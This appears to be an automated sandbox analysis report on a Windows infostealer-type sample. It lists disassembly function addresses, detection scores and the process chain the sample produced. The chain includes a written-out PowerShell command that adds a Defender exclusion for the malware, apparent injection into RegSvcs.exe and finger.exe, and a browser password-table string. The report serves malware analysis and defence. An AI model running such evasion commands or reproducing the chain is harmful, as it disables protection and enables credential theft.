                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013769624_2_01376962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013629A04_2_013629A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0142A9A64_2_0142A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013628404_2_01362840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136A8404_2_0136A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013468B84_2_013468B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E8F04_2_0138E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141AB404_2_0141AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01416BD74_2_01416BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135EA804_2_0135EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136AD004_2_0136AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01378DBF4_2_01378DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135ADE04_2_0135ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360C004_2_01360C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01350CF24_2_01350CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400CB54_2_01400CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01380F304_2_01380F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013A2F284_2_013A2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D4F404_2_013D4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013DEFA04_2_013DEFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136CFE04_2_0136CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01352FC84_2_01352FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141EE264_2_0141EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360E594_2_01360E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141EEDB4_2_0141EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01372E904_2_01372E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141CE934_2_0141CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0142B16B4_2_0142B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134F1724_2_0134F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0139516C4_2_0139516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136B1B04_2_0136B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0140F0CC4_2_0140F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141F0E04_2_0141F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014170E94_2_014170E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013670C04_2_013670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141132D4_2_0141132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134D34C4_2_0134D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013A739A4_2_013A739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013652A04_2_013652A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014012ED4_2_014012ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137B2C04_2_0137B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014175714_2_01417571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FD5B04_2_013FD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013514604_2_01351460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141F43F4_2_0141F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141F7B04_2_0141F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014116CC4_2_014116CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F59104_2_013F5910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013699504_2_01369950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137B9504_2_0137B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013CD8004_2_013CD800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013638E04_2_013638E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141FB764_2_0141FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137FB804_2_0137FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0139DBF94_2_0139DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D5BF04_2_013D5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01417A464_2_01417A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141FA494_2_0141FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D3A6C4_2_013D3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0140DAC64_2_0140DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013FDAAC4_2_013FDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013A5AA04_2_013A5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01411D5A4_2_01411D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01417D734_2_01417D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01363D404_2_01363D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137FDC04_2_0137FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D9C324_2_013D9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141FCF24_2_0141FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141FF094_2_0141FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01361F924_2_01361F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01323FD24_2_01323FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01323FD54_2_01323FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141FFB14_2_0141FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01369EB04_2_01369EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324A3527_2_0324A352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032503E67_2_032503E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0319E3F07_2_0319E3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032302747_2_03230274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032102C07_2_032102C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031801007_2_03180100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0322A1187_2_0322A118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032181587_2_03218158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032501AA7_2_032501AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032481CC7_2_032481CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032220007_2_03222000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031B47507_2_031B4750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031907707_2_03190770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0318C7C07_2_0318C7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031AC6E07_2_031AC6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031905357_2_03190535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032505917_2_03250591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032424467_2_03242446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0323E4F67_2_0323E4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324AB407_2_0324AB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03246BD77_2_03246BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0318EA807_2_0318EA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031A69627_2_031A6962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0325A9A67_2_0325A9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031929A07_2_031929A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0319A8407_2_0319A840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031928407_2_03192840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031768B87_2_031768B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031BE8F07_2_031BE8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031B0F307_2_031B0F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031D2F287_2_031D2F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03204F407_2_03204F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0320EFA07_2_0320EFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03182FC87_2_03182FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0319CFE07_2_0319CFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324EE267_2_0324EE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03190E597_2_03190E59
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031A2E907_2_031A2E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324CE937_2_0324CE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324EEDB7_2_0324EEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0319AD007_2_0319AD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0322CD1F7_2_0322CD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031A8DBF7_2_031A8DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0318ADE07_2_0318ADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03190C007_2_03190C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03230CB57_2_03230CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03180CF27_2_03180CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324132D7_2_0324132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0317D34C7_2_0317D34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031D739A7_2_031D739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031952A07_2_031952A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032312ED7_2_032312ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031AB2C07_2_031AB2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0325B16B7_2_0325B16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0317F1727_2_0317F172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031C516C7_2_031C516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0319B1B07_2_0319B1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324F0E07_2_0324F0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032470E97_2_032470E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031970C07_2_031970C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0323F0CC7_2_0323F0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324F7B07_2_0324F7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032416CC7_2_032416CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032475717_2_03247571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0322D5B07_2_0322D5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324F43F7_2_0324F43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031814607_2_03181460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324FB767_2_0324FB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031AFB807_2_031AFB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03205BF07_2_03205BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031CDBF97_2_031CDBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03203A6C7_2_03203A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03247A467_2_03247A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324FA497_2_0324FA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03231AA37_2_03231AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0322DAAC7_2_0322DAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031D5AA07_2_031D5AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0323DAC67_2_0323DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_032259107_2_03225910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031999507_2_03199950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031AB9507_2_031AB950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031FD8007_2_031FD800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031938E07_2_031938E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324FF097_2_0324FF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03191F927_2_03191F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324FFB17_2_0324FFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03199EB07_2_03199EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03247D737_2_03247D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03193D407_2_03193D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03241D5A7_2_03241D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031AFDC07_2_031AFDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03209C327_2_03209C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0324FCF27_2_0324FCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_008622307_2_00862230
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0085D0A07_2_0085D0A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_008511847_2_00851184
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0087C1307_2_0087C130
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0085D2C07_2_0085D2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0085B2D07_2_0085B2D0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0085B41D7_2_0085B41D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0085B4207_2_0085B420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_008659007_2_00865900
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00863B107_2_00863B10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02E9E3547_2_02E9E354
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02EA546C7_2_02EA546C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02E9E4737_2_02E9E473
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02E9CB787_2_02E9CB78
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02E9D8D87_2_02E9D8D8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02E9E80C7_2_02E9E80C
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 031D7E54 appears 101 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 031C5130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 031FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0317B970 appears 275 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0320F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01395130 appears 57 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0134B970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 013A7E54 appears 100 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 013CEA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 013DF290 appears 105 times
                Source: oss4CtI8oz.exeStatic PE information: invalid certificate
                Source: oss4CtI8oz.exe, 00000000.00000000.853030195.0000000000853000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLouH.exe. vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.943349052.0000000003DA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.942384571.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.942384571.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.966088483.0000000007340000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.938830651.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exe, 00000000.00000002.954042224.0000000007190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exeBinary or memory string: OriginalFilenameLouH.exe. vs oss4CtI8oz.exe
                Source: oss4CtI8oz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: oss4CtI8oz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, bc2a3e31wbBrI9NhD4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, bc2a3e31wbBrI9NhD4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, bc2a3e31wbBrI9NhD4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, bc2a3e31wbBrI9NhD4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/12@19/11
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oss4CtI8oz.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drhw4cly.hbg.ps1Jump to behavior
                Source: oss4CtI8oz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: oss4CtI8oz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: finger.exe, 00000007.00000003.1258102670.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3337828652.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3337828652.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1257140033.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3337828652.0000000000C55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: oss4CtI8oz.exeVirustotal: Detection: 77%
                Source: oss4CtI8oz.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\oss4CtI8oz.exe "C:\Users\user\Desktop\oss4CtI8oz.exe"
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: windows.storage.dllJump to behavior
